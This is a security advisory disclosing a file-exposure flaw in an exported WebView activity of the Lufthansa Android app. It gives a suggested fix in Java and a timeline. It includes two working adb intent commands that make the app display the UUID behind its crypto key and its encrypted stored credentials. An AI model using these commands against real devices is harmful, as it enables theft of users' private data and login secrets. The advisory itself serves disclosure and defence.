SIK-2017-004


Title:

Private Files Extraction Possible in Lufthansa App

Report ID

SIK-2017-004

Summary:

  • Vendor: Deutsche Lufthansa AG
  • Product: Lufthansa App
  • Affected Version: 5.6.1
  • Severity: medium
  • Short summary: Arbitrary private files (shared preferences, crypto secrets, etc.) can be extracted from the Lufthansa app.

Details:

The Lufthansa app implements an activity "LufthansaWebActivity" that hosts a WebView component. Because the activity is exported, any other app on the device (or anyone with adb access) can send it a specially-crafted intent that redirects the WebView to an arbitrary URI, including local file:// URIs. An attacker can use this to have the WebView render files from the app's private data directory that are otherwise inaccessible to other apps, and then read their contents from the rendered page. In combination with SIK-2017-003, this attack can be used to extract the crypto key that the app uses to encrypt the user's login credentials for the Lufthansa website and app.

Details on intent:

Display the file that contains the UUID from which the crypto key is derived:

am start -n com.lufthansa.android.lufthansa/.ui.activity.web.LufthansaWebActivity -d http://internal-browser/?url=file:///data/data/com.lufthansa.android.lufthansa/files/ad_id_guid -es "EXTRA_URL" "file:///data/data/com.lufthansa.android.lufthansa/files/ad_id_guid"

Display the encrypted credentials:

am start -n com.lufthansa.android.lufthansa/.ui.activity.web.LufthansaWebActivity -d http://internal-browser/?url=file:///data/data/com.lufthansa.android.lufthansa/files/search2.cache -es "EXTRA_URL" "file:///data/data/com.lufthansa.android.lufthansa/files/search2.cache"

The encrypted credentials are harder to extract than the UUID, because the ciphertext may contain non-printable bytes that the WebView does not render and that the attacker therefore cannot read back. This is not adequate protection, however: whether a given byte survives rendering depends on the concrete ciphertext value, not on any security control, so some credentials will be fully recoverable and the rest only partially obscured.

Workaround

Always log out of the Lufthansa app when it is not in use, so that the stored credentials are removed from the phone.

Suggested Mitigation

Check whether it is really necessary that this activity is exported; if not, mark it android:exported="false" in the manifest so that only the app itself can start it. If it must remain exported, never load a URL taken from an untrusted intent without validation: accept only https URLs whose host is on an allowlist, reject file://, content:// and other local schemes, and additionally disable file access in the WebView itself (setAllowFileAccess(false), setAllowFileAccessFromFileURLs(false), setAllowUniversalAccessFromFileURLs(false)) so that a local file cannot be displayed even if a check is bypassed. Apply the same check to every subsequent navigation in the WebView, not only to the initial load.
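The following is an added illustration of the hardening described above, written for this advisory; it is not Lufthansa's code and nothing about the real LufthansaWebActivity is known beyond what the advisory states. The class name HardenedWebActivity, the allowlisted host and the decision to ignore the intent's data URI entirely are assumptions; only the EXTRA_URL extra name is taken from the advisory. The WebView settings are the standard Android WebSettings calls.

```java
// Added example for this advisory (not Lufthansa's code): a WebView-hosting
// Activity that can be left exported without allowing local files to be shown.
// In addition, the manifest should carry android:exported="false" whenever the
// activity does not have to be reachable from other apps.
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebResourceRequest;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

public class HardenedWebActivity extends Activity {
    // Same extra name as in the advisory's am commands.
    public static final String EXTRA_URL = "EXTRA_URL";
    // Assumed allowlist; a real app would list exactly the hosts it needs.
    private static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("www.lufthansa.com"));

    private WebView webView;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        webView = new WebView(this);
        setContentView(webView);

        // Defence in depth: even if a URL check were bypassed, the WebView
        // itself refuses to load file:// and content:// resources.
        WebSettings s = webView.getSettings();
        s.setAllowFileAccess(false);
        s.setAllowContentAccess(false);
        s.setAllowFileAccessFromFileURLs(false);
        s.setAllowUniversalAccessFromFileURLs(false);

        // Re-check every navigation, not just the first load, so that a page
        // reached via an allowed URL cannot redirect into a local file.
        webView.setWebViewClient(new WebViewClient() {
            @Override // API 24+
            public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
                return !isAllowed(request.getUrl()); // true = block navigation
            }

            @Override // pre-API 24
            @SuppressWarnings("deprecation")
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                return !isAllowed(Uri.parse(url));
            }
        });

        Uri target = resolveTarget(getIntent());
        if (target == null) {
            // Untrusted or missing URL: show nothing rather than a fallback page
            // derived from attacker input.
            finish();
            return;
        }
        webView.loadUrl(target.toString());
    }

    /**
     * Take the URL only from EXTRA_URL (the intent's data URI, which the
     * original attack also used, is deliberately ignored) and accept it only
     * if it passes the scheme/host allowlist.
     */
    static Uri resolveTarget(Intent intent) {
        String raw = intent == null ? null : intent.getStringExtra(EXTRA_URL);
        if (raw == null) {
            return null;
        }
        Uri u = Uri.parse(raw);
        return isAllowed(u) ? u : null;
    }

    /** Allow only hierarchical https URLs whose host is on the allowlist. */
    static boolean isAllowed(Uri u) {
        if (u == null || !u.isHierarchical()) {
            return false;           // rejects opaque URIs such as javascript:...
        }
        String scheme = u.getScheme();
        String host = u.getHost();
        return "https".equalsIgnoreCase(scheme)
                && host != null
                && ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
    }
}
```

With this in place, both am commands from the advisory cause the activity to finish immediately: the data URI is never consulted, and the EXTRA_URL value has scheme file rather than https, so resolveTarget returns null. The WebSettings calls are the backstop for the case where a future code change loads a URL from another source without going through isAllowed.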

Timeline

  • 2017-01-18: Vulnerability Discovered
  • 2017-02-15: Reported
  • 2017-05-17: Vulnerability Fixed